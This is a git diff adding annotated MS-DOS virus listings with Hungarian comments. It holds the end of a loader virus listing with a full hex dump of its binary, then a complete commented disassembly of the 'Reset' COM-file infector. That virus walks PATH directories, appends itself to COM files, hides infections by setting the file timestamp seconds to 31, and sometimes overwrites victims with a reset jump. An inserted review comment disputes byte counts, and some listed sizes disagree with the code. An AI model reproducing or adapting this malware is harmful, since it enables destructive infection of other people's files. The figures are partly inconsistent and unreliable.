+ ;s a fertzend file neve ttal
+ ;egytt.
+
+
+ ;Ide mutat a DTA. Ezt a terletet fogja a DOS a file adataival
+ ;feltlteni.
+
+0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
+036D ENT_ATTR DB (?) ;Attributtum [SI+74]
+036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75]
+0370 ENT_DATUM DW (?) ;Keletkezs dtuma [SI+77]
+0372 ENT_HOSSZ DW (?) ;Als sz [SI+79]
+0374 DW (?) ;Fels sz [SI+7B]
+0376 ENT_NEV DB 0D DUP (?);Megtallt file neve [SI+7D]
+
+0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
+ ;Nem hasznlja
+
+ ;----------------------------------------------------
+ ; A Tltgett behz rsz
+ ;----------------------------------------------------
+
+
+0388 50 PUSH AX ;Regiszterek elmentse
+0389 53 PUSH BX
+038A 51 PUSH CX
+038B 52 PUSH DX
+038C 06 PUSH ES
+038D 1E PUSH DS
+038E 57 PUSH DI
+038F 56 PUSH SI
+0390 E80000 CALL 0393 ;Lebuks !! (/g)
+0393 5B POP BX ;BX=0393
+
+ ;A: BOOT beolvassa/Tltget lekrdezse
+
+0394 BEA55A MOV SI,5AA5 ;Tltget lekrdezse
+0397 BFAA55 MOV DI,55AA
+039A 0E PUSH CS
+039B 07 POP ES
+039C 81C3E803 ADD BX,03E8 ;BX=077B
+03A0 81FBE803 CMP BX,03E8
+03A4 7303 JNB 03A9
+03A6 E98200 JMP 042B ;Ha nincs elg szabad memria a szegmensen
+03A9 53 PUSH BX
+03AA B80102 MOV AX,0201 ;A:BOOT beolvassa
+03AD BA0000 MOV DX,0000
+03B0 B90100 MOV CX,0001
+03B3 CD13 INT 13
+03B5 5B POP BX
+03B6 7308 JNB 03C0
+03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
+03BB 74EC JZ 03A9
+03BD EB6C JMP 042B ;Valdi hiba->vge
+03BF 90 NOP
+03C0 81FE5AA5 CMP SI,A55A
+03C4 7465 JZ 042B ;Vge, ha a Tltget mr a memriban van
+
+ ;Van-e elg szabad memria a Tltget beolvasshoz
+
+03C6 8CC8 MOV AX,CS
+03C8 050010 ADD AX,1000
+03CB 53 PUSH BX
+03CC 50 PUSH AX
+03CD CD12 INT 12 ;Max mem.
+03CF BB4000 MOV BX,0040
+03D2 F7E3 MUL BX ;AX-ben a memria tetejnek szegmense
+03D4 2D0010 SUB AX,1000 ;legalbb 4Kb kell a Tltgetnek
+03D7 8BD8 MOV BX,AX
+03D9 58 POP AX ;CS+1000
+03DA 3BD8 CMP BX,AX
+03DC 7304 JNB 03E2
+03DE 5B POP BX
+03DF EB4A JMP 042B ;Vge, ha nincs elg szabad memria
+03E1 90 NOP
+
+ ; A lemez utls svjnak megkeresse
+
+03E2 5B POP BX ;BX=077B
+03E3 8EC0 MOV ES,AX ;Max mem-1000
+03E5 2E CS:
+03E6 8B4718 MOV AX,[BX+18] ;Sv hossza
+03E9 2E CS:
+03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak szma
+03ED F7E1 MUL CX
+03EF 8BC8 MOV CX,AX ;Egy cilinder nagysga
+03F1 2E CS:
+03F2 8B4713 MOV AX,[BX+13] ;Szektorok szma
+03F5 BA0000 MOV DX,0000
+03F8 F7F1 DIV CX ;Osztva a cilinder nagysgval AL-ben a sv
+
+ ; Az utls sv beolvassa
+
+03FA 81EBE803 SUB BX,03E8 ;BX=0393
+03FE 53 PUSH BX
+03FF 8AE8 MOV CH,AL ;40/80-dik sv
+0401 B101 MOV CL,01
+0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
+0406 BA0000 MOV DX,0000
+0409 B80802 MOV AX,0208 ;8 szektor beolvassa
+040C CD13 INT 13
+040E 5B POP BX
+040F 721A JB 042B ;Hibnl vge
+
+ ; Ha a Tltgett tall, elindtja
+
+0411 53 PUSH BX
+0412 BB0001 MOV BX,0100
+0415 26 ES:
+0416 8B07 MOV AX,[BX]
+0418 3D5224 CMP AX,2452 ;Azonost
+041B 5B POP BX
+041C 750D JNZ 042B ;Ha nem Tltget
+041E 8BC3 MOV AX,BX
+0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat)
+0423 0E PUSH CS
+0424 50 PUSH AX
+0425 B80A01 MOV AX,010A ;Tltget belpsi pontja
+0428 06 PUSH ES
+0429 50 PUSH AX
+042A CB RETF
+
+ ; Visszatrs
+
+042B 5E POP SI ;Regiszterek vissza
+042C 5F POP DI
+042D 1F POP DS
+042E 07 POP ES
+042F 5A POP DX
+0430 59 POP CX
+0431 5B POP BX
+0432 58 POP AX
+0433 C3 RET
+0434 0000 DW 0000 ;???
+
+
+ A vrus hexa dumpja :
+
+
+0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
+0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
+0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
+0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
+0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
+0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
+0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
+0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
+0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
+0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
+01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
+01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
+01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
+01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
+01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
+01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
+0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
+0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
+0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
+0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
+0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
+0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
+0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
+0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
+0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
+0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
+02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
+02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
+02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
+02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
+02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
+02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
+0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
+0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
+0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
+0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
+0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
+0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
+0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
+0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
+0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
+0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
+03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
+03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
+03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
+03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
+03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
+03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
+0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
+0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
+0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
+0430 59 5B 58 C3 00 00 Y[X...
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.v_dos625.asm b/MSDOS/Virus.MSDOS.Unknown.v_dos625.asm
new file mode 100644
index 00000000..f5174385
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.v_dos625.asm
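Review bot: The annotation at 0292/0295 (`CMP AX,0336` / `JNZ 02B1 ;Ha nem rta ki mind a 648 byteot`) contradicts the listing's own figures: 0336h is 822, which matches both the header text and the `MOV CX,0336 ;822 byte (a vrus hossza)` comment a few lines above, so the `648` looks like a leftover from the parent variant's listing (the v_dos625 file in this same commit writes 0288h, i.e. 648 bytes) and should read `;Ha nem rta ki mind a 822 byteot`. Two more labels in this hunk disagree with the data area: `MOV CX,[SI+0004] ;ERE_TIME (027D)` at 02B5 should say `(02FD)`, since ERE_TIME is declared at 02FD, and the comment at 01E1 calls the size limit `64000h` although the compare is against FA00h, which is 64000 decimal (likewise 01E8 says `10h` for a compare against +0A). The `legalbb 4Kb kell a Tltgetnek` remark at 03D4 also seems off, since `SUB AX,1000` on a paragraph-count value reserves 64 KB rather than 4 KB — worth confirming against what the annotator meant. For a listing kept as an analysis reference, the infection marker (seconds field forced to 1Fh at 02BD) and the 822-byte append length are the values an analyst would key on, so keeping those annotations consistent matters more than the rest.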
@@ -0,0 +1,571 @@
+Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
+ (41) 21-033
+
+
+
+Unassemble list:
+
+114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
+114E:0103 49 DEC CX
+114E:0104 60 DB 60
+114E:0105 61 DB 61
+114E:0106 6D DB 6D
+114E:0107 206120 AND [BX+DI+20],AH
+114E:010A 52 PUSH DX
+114E:010B 65 DB 65
+114E:010C 7365 JNB 0173
+114E:010E 7420 JZ 0130
+114E:0110 56 PUSH SI
+114E:0111 49 DEC CX
+114E:0112 52 PUSH DX
+114E:0113 55 PUSH BP
+114E:0114 53 PUSH BX
+114E:0115 2124 AND [SI],SP
+114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
+ ;program kezdete
+114E:011A B409 MOV AH,09
+114E:011C CD21 INT 21 ;uzenet kepernyore
+114E:011E B400 MOV AH,00
+114E:0120 CD20 INT 20 ;exit to DOS
+
+114E:0122 51 PUSH CX ;stack-en marad
+
+ ;a kovetkezo utasitas operandusat fertozeskor
+ ;allitja be, igy mindig a helyes cimre mutat
+
+114E:0123 BA1B03 MOV DX,031B
+114E:0126 FC CLD ;elore
+114E:0127 8BF2 MOV SI,DX
+114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
+114E:012D BF0001 MOV DI,0100 ;program eleje
+114E:0130 B90300 MOV CX,0003 ;3 byte
+114E:0133 F3 REPZ
+114E:0134 A4 MOVSB ;eredeti JMP 117
+ ;visszamasolasa
+114E:0135 8BF2 MOV SI,DX
+114E:0137 B430 MOV AH,30
+114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
+114E:013B 3C00 CMP AL,00
+114E:013D 7503 JNZ 0142
+114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
+ ;nem fertoz a virus s
+ ;futtatja az eredeti
+ ;programot
+114E:0142 06 PUSH ES
+114E:0143 B42F MOV AH,2F
+114E:0145 CD21 INT 21 ;DTA. lekerdezese
+114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
+114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
+114E:014F 07 POP ES
+
+ ;DTA. beallitasa az ENTRY cimere /dir.-bol/
+ ;ide masolja a find first a file adatait
+
+114E:0150 BA5F00 MOV DX,005F ;DX=037a
+114E:0153 90 NOP
+114E:0154 03D6 ADD DX,SI
+114E:0156 B41A MOV AH,1A
+114E:0158 CD21 INT 21 ;DTA. letrehozasa
+ ;037a-tol uj cimre
+114E:015A 06 PUSH ES
+114E:015B 56 PUSH SI
+114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
+114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
+ ;kovetkezo dir.-ra mu-
+ ;tatni
+114E:0163 5E POP SI
+114E:0164 56 PUSH SI
+114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
+ ;stringet keresi a
+ ;kornyezetbe PATH
+114E:0169 AC LODSB ;AL=DS:[SI],SI++
+114E:016A B90080 MOV CX,8000 ;32 kbyte
+114E:016D F2 REPNZ
+114E:016E AE SCASB ;megkeresi a kovetke-
+ ;zo P betut
+114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
+114E:0172 AC LODSB
+114E:0173 AE SCASB ;betunkent hasonlitja
+114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
+ ;karakter /kov.betu/
+114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
+ ;osszehasonlitja a tobbi
+ ;betut is
+114E:0178 5E POP SI
+114E:0179 07 POP ES ;ES:DI mutat az elso
+ ;PATH-ra
+114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
+ ;spec. cimenek mentese
+ ;PATH mutato
+114E:017E 8BFE MOV DI,SI ;SI=031b
+114E:0180 81C71F00 ADD DI,001F ;DI=033a
+114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
+ ;tat az adatokra
+114E:0186 81C61F00 ADD SI,001F ;SI=033a
+114E:018A 8BFE MOV DI,SI ;DI=033a
+114E:018C EB3A JMP 01C8
+
+ ;A kovetkezo PATH-ban megadott aldirectoryt
+ ;File Path-ra masolja, igy a kovetkezo file-t
+ ;ebben az aldirectoryban keresi
+
+114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
+114E:0193 7503 JNZ 0198
+114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
+114E:0198 1E PUSH DS
+114E:0199 56 PUSH SI
+114E:019A 26 ES:
+114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
+114E:019F 8BFE MOV DI,SI ;DI=033a
+114E:01A1 26 ES:
+114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
+ ;masolasa ha az aktualis
+ ;konyvtarban nem talalt
+ ;fertozheto file-t
+ ;a PATH= utanra mutat
+ ;az SI
+114E:01A6 81C71F00 ADD DI,001F
+114E:01AA AC LODSB ;beolvas a kornyezetbol
+ ;a 0029. byte-ot
+114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
+114E:01AD 740A JZ 01B9 ;igen
+114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
+ ;tobb
+114E:01B1 7403 JZ 01B6 ;igen
+114E:01B3 AA STOSB ;letarol 033a-tol
+114E:01B4 EBF4 JMP 01AA
+
+114E:01B6 BE0000 MOV SI,0000
+114E:01B9 5B POP BX ;BX=regi SI BX mutat
+ ;az adatokra
+114E:01BA 1F POP DS
+114E:01BB 89B71600 MOV [BX+0016],SI
+
+ ;a kovetkezo PATH-ban adott dir. mar atmasolva
+
+114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
+114E:01C3 7403 JZ 01C8 ;igen
+114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
+
+ ;egy aldir. kiertekelese, eloszor az aktualis, majd
+ ;a file path -ra masolt aldir. vegignezese, fertozes
+ ;DI a file path-ba irt aldir. neve utani poz.-ra mu-
+ ;tat
+
+ ;COM file keresese
+
+114E:01C7 AA STOSB ;\ jel beirasa
+114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
+ ;file nevet masolni,
+ ;az aldir. neve utan
+114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
+114E:01CE 81C61000 ADD SI,0010 ;SI=032b
+114E:01D2 B90600 MOV CX,0006
+114E:01D5 F3 REPZ
+114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
+ ;a PATH= szoveg utan
+114E:01D7 8BF3 MOV SI,BX
+114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
+ ;alltal foglalt teru-
+ ;letre
+114E:01DB BA1F00 MOV DX,001F
+114E:01DE 90 NOP
+114E:01DF 03D6 ADD DX,SI
+114E:01E1 B90300 MOV CX,0003
+114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
+ ;resese, az it. aktivi-
+ ;zalasa utan felhozza a
+ ;filemeretet, attrib.ot
+ ;keletkezes datumat s
+ ;idejet is!
+114E:01E6 EB04 JMP 01EC ;vizsgalatra
+114E:01E8 B44F MOV AH,4F
+114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
+ ;zes keresese
+114E:01EC 7302 JNB 01F0 ;ha nincs hiba
+114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
+ ;talal tobb COM file-t
+ ;mas aldirt keres
+ ;mar talalt COM file-t, az adataival az entry fel
+ ;van toltve, a file ellenorzese es fertozese
+ ;kovetkezik
+
+114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
+ ;SI=0390
+114E:01F4 241F AND AL,1F ;maszk 31 -el
+114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
+ ;zott a file!
+114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
+ ;file-t keresi
+114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
+114E:0200 77E6 JA 01E8 ;ha > a file meret
+ ;64000 byte-nal
+114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
+114E:0207 72DF JB 01E8 ;ha < 10 byte nal
+114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
+
+ ;megvan a kivalasztott file
+ ;a file nevet a filespec utan kell masolni
+
+114E:020D 56 PUSH SI ;DI mutat a filespec.re,
+ ;PATH=*.COM
+114E:020E 81C67D00 ADD SI,007D ;SI=0398
+
+114E:0212 AC LODSB ;atmasolja a filenevet
+ ;/megkeresett elso v.
+ ;x.edik bejegyzest/
+114E:0213 AA STOSB
+114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
+ ;zaro nullaig masol
+114E:0216 75FA JNZ 0212 ;nem
+114E:0218 5E POP SI ;SI ujra az adatokra mu-
+ ;tat
+ ;a file egyes eredeti informacioinak megorzese
+ ;hogy a fertozese ne tunjon fel
+ ;minek a file ATTR. megegyszer lekerdezni?
+
+114E:0219 B80043 MOV AX,4300
+114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
+114E:021F 90 NOP
+114E:0220 03D6 ADD DX,SI ;DX=031b
+114E:0222 CD21 INT 21 ;attributum lekerdezese
+ ;7.6.5.4.3.2.1.0.
+ ;x x a d v s h r
+114E:0224 898C0800 MOV [SI+0008],CX ;attributum
+114E:0228 B80143 MOV AX,4301
+114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
+ ;ra valtoztatja
+114E:022F BA1F00 MOV DX,001F
+114E:0232 90 NOP
+114E:0233 03D6 ADD DX,SI ;DX=033a
+114E:0235 CD21 INT 21 ;attributum beallitasa
+
+ ;file nyitasa
+
+114E:0237 B8023D MOV AX,3D02
+114E:023A BA1F00 MOV DX,001F
+114E:023D 90 NOP
+114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
+114E:0240 CD21 INT 21 ;file nyitasa I/O ra
+114E:0242 7303 JNB 0247
+114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
+ ;fertozes
+114E:0247 8BD8 MOV BX,AX ;handle
+
+ ;a file idejenek lekerdezese de ez is megtalalhato az
+ ;ENTRY teruleten
+
+114E:0249 B80057 MOV AX,5700
+114E:024C CD21 INT 21 ;file letrehozasi datum
+ ;es ido bekerese
+114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
+ DH-sec DL-1/100
+114E:0252 89940600 MOV [SI+0006],DX ;datum
+114E:0256 B42C MOV AH,2C
+114E:0258 CD21 INT 21 ;rendszerido bekerese
+
+ ;annak eldontese hogy a filet tonkretegye-e
+ ;ha a masodperc 7 akkor tonkreteszi /aktualis/
+
+114E:025A 80E607 AND DH,07 ;sec = 7 ?
+114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
+
+ ;file tonkretetele
+
+114E:025F B440 MOV AH,40
+114E:0261 B90500 MOV CX,0005
+114E:0264 8BD6 MOV DX,SI ;reset
+114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
+114E:026A CD21 INT 21 ;file elejere ir 5 byte
+ ;-ot a RESET re ugrast!
+114E:026C EB65 JMP 02D3
+
+114E:026E 90 NOP
+
+ ;fertozes
+ ;az eredeti 3 byte megorzese hogy kesobb meg futtatni
+ ;lehessen
+
+114E:026F B43F MOV AH,3F
+114E:0271 B90300 MOV CX,0003
+114E:0274 BA0A00 MOV DX,000A
+114E:0277 90 NOP
+114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
+114E:027A CD21 INT 21 ;a program eredeti elso
+ ;3 byte-jat beolvassa
+114E:027C 7255 JB 02D3 ;ha hiba van
+114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
+114E:0281 7550 JNZ 02D3 ;nem
+
+ ;file vegere allas az uj cimek kiszamitasa
+
+114E:0283 B80242 MOV AX,4202
+114E:0286 B90000 MOV CX,0000
+114E:0289 BA0000 MOV DX,0000
+114E:028C CD21 INT 21 ;file vegere pozicional
+114E:028E 7243 JB 02D3 ;ha hiba volt -nem
+ ;nagyon lehet hiba!
+
+ ;file elejere irando JMP operandus kiszamitasa
+
+114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
+114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
+ ;utasitashoz amit a
+ ;file elejere fog irni
+ ;igy a JMP a file mos-
+ ;tani vege utani bytera
+ ;fog mutatni
+114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
+
+ ;az uj file-on beluli adatterulet cimenek ki-
+ ;szamitasa es beallitasa
+
+114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
+ ;adatteruletre mutat
+114E:029D 8BFE MOV DI,SI
+114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
+ ;nak operandusanak
+ ;cime
+114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
+ ;cimet
+
+ ;file moge masolja magat
+ ;filemutato a file vegere mutat
+
+114E:02A5 B440 MOV AH,40
+114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
+114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
+ ;mutat
+114E:02AC 81EAF901 SUB DX,01F9
+114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
+ ;program a fertozendo
+ ;program moge irja
+114E:02B2 721F JB 02D3 ;hiba eseten
+114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
+114E:02B7 751A JNZ 02D3 ;igen
+
+ ;az elso 3 byte atallitasa, egy file
+ ;vegere mutato ugro utasitasra
+
+114E:02B9 B80042 MOV AX,4200
+114E:02BC B90000 MOV CX,0000
+114E:02BF BA0000 MOV DX,0000
+114E:02C2 CD21 INT 21 ;file pointer a vegere
+114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
+ ;het hiba!
+114E:02C6 B440 MOV AH,40
+114E:02C8 B90300 MOV CX,0003
+114E:02CB 8BD6 MOV DX,SI
+114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
+ ;mutat
+114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
+
+ ;az eredeti ido -mar a fertozesjelzessel egyutt-
+ ;visszaallitasa
+
+114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
+114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
+114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
+114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
+ ;jelzi hogy mar ferto-
+ ;zott egy file a SEC.
+ ;-et 31-re allitja a
+ ;file bejegyzesben
+ ; hour | min. | sec.
+ ;1111 1|111 111|0 0000 +114E:02E3 B80157 MOV AX,5701 +114E:02E6 CD21 INT 21 ;file keletk. ido beall. + + ;file zarasa + +114E:02E8 B43E MOV AH,3E +114E:02EA CD21 INT 21 ;file zarasa + + ;eredeti attributum visszaallitasa + +114E:02EC B80143 MOV AX,4301 +114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./ +114E:02F3 BA1F00 MOV DX,001F +114E:02F6 90 NOP + + ;DTA. visszaallitasa az eredeti cimre + +114E:02F7 03D6 ADD DX,SI +114E:02F9 CD21 INT 21 ;file attr. beallitasa +114E:02FB 1E PUSH DS +114E:02FC B41A MOV AH,1A +114E:02FE 8B940000 MOV DX,[SI+0000] +114E:0302 8E9C0200 MOV DS,[SI+0002] +114E:0306 CD21 INT 21 ;DTA. megadasa +114E:0308 1F POP DS + + ;az eredeti program futtatasa + +114E:0309 59 POP CX +114E:030A 33C0 XOR AX,AX ;reg. nullazasa +114E:030C 33DB XOR BX,BX +114E:030E 33D2 XOR DX,DX +114E:0310 33F6 XOR SI,SI +114E:0312 BF0001 MOV DI,0100 +114E:0315 57 PUSH DI ;elteszi a 0100 offsetet + ;hogy a RET elo tudja + ;venni es odaugrik +114E:0316 33FF XOR DI,DI +114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset- + ;re, ott mar az eredeti + ;JMP 117 utasitas van, + ;igy vegrehajtodik az + ;eredeti prg. + ;SP- hogy minek ? 
+114E:031B 800046 ADD BYTE PTR [BX+SI],46 +114E:031E 0D2001 OR AX,0120 +114E:0321 2100 AND [BX+SI],AX +114E:0323 2000 AND [BX+SI],AL +114E:0325 EB15 JMP 033C +114E:0327 90 NOP +114E:0328 E91F00 JMP 034A +114E:032B 2A2E434F SUB CH,[4F43] +114E:032F 4D DEC BP +114E:0330 0028 ADD [BX+SI],CH +114E:0332 004703 ADD [BX+03],AL +114E:0335 50 PUSH AX +114E:0336 41 INC CX +114E:0337 54 PUSH SP +114E:0338 48 DEC AX +114E:0339 3D5245 CMP AX,4552 +114E:033C 53 PUSH BX +114E:033D 45 INC BP +114E:033E 54 PUSH SP +114E:033F 2E CS: +114E:0340 43 INC BX +114E:0341 4F DEC DI +114E:0342 4D DEC BP +114E:0343 0000 ADD [BX+SI],AL +114E:0345 0000 ADD [BX+SI],AL +114E:0347 4D DEC BP +114E:0348 004449 ADD [SI+49],AL +114E:034B 54 PUSH SP +114E:034C 2E CS: +114E:034D 43 INC BX +114E:034E 4F DEC DI +114E:034F 4D DEC BP +114E:0350 0000 ADD [BX+SI],AL +114E:0352 2020 AND [BX+SI],AH +114E:0354 2020 AND [BX+SI],AH +114E:0356 2020 AND [BX+SI],AH +114E:0358 2020 AND [BX+SI],AH +114E:035A 2020 AND [BX+SI],AH +114E:035C 2020 AND [BX+SI],AH +114E:035E 2020 AND [BX+SI],AH +114E:0360 2020 AND [BX+SI],AH +114E:0362 2020 AND [BX+SI],AH +114E:0364 2020 AND [BX+SI],AH +114E:0366 2020 AND [BX+SI],AH +114E:0368 2020 AND [BX+SI],AH +114E:036A 2020 AND [BX+SI],AH +114E:036C 2020 AND [BX+SI],AH +114E:036E 2020 AND [BX+SI],AH +114E:0370 2020 AND [BX+SI],AH +114E:0372 2020 AND [BX+SI],AH +114E:0374 2020 AND [BX+SI],AH +114E:0376 2020 AND [BX+SI],AH +114E:0378 2020 AND [BX+SI],AH +114E:037A 013F ADD [BX],DI +114E:037C 3F AAS +114E:037D 3F AAS +114E:037E 3F AAS +114E:037F 3F AAS +114E:0380 3F AAS +114E:0381 3F AAS +114E:0382 3F AAS +114E:0383 43 INC BX +114E:0384 4F DEC DI +114E:0385 4D DEC BP +114E:0386 0301 ADD AX,[BX+DI] +114E:0388 0000 ADD [BX+SI],AL +114E:038A 002E8B26 ADD [268B],CH +114E:038E 68 DB 68 +114E:038F 2020 AND 